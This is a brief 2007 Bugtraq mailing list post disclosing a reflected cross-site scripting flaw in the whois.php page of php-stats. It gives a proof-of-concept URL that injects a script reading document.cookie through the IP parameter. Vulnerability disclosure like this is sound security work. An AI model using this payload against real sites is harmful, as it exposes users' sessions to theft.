Bugtraq mailing list archives

php-stats xss whois.php


From: vasodipandora () gmail com
Date: 11 Aug 2007 14:21:06 -0000

I have found an xss in whois.php page of php-stats.

http://phpstats.net/

Here is the XSS

php-stats-path/whois.php?IP=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E


Current thread: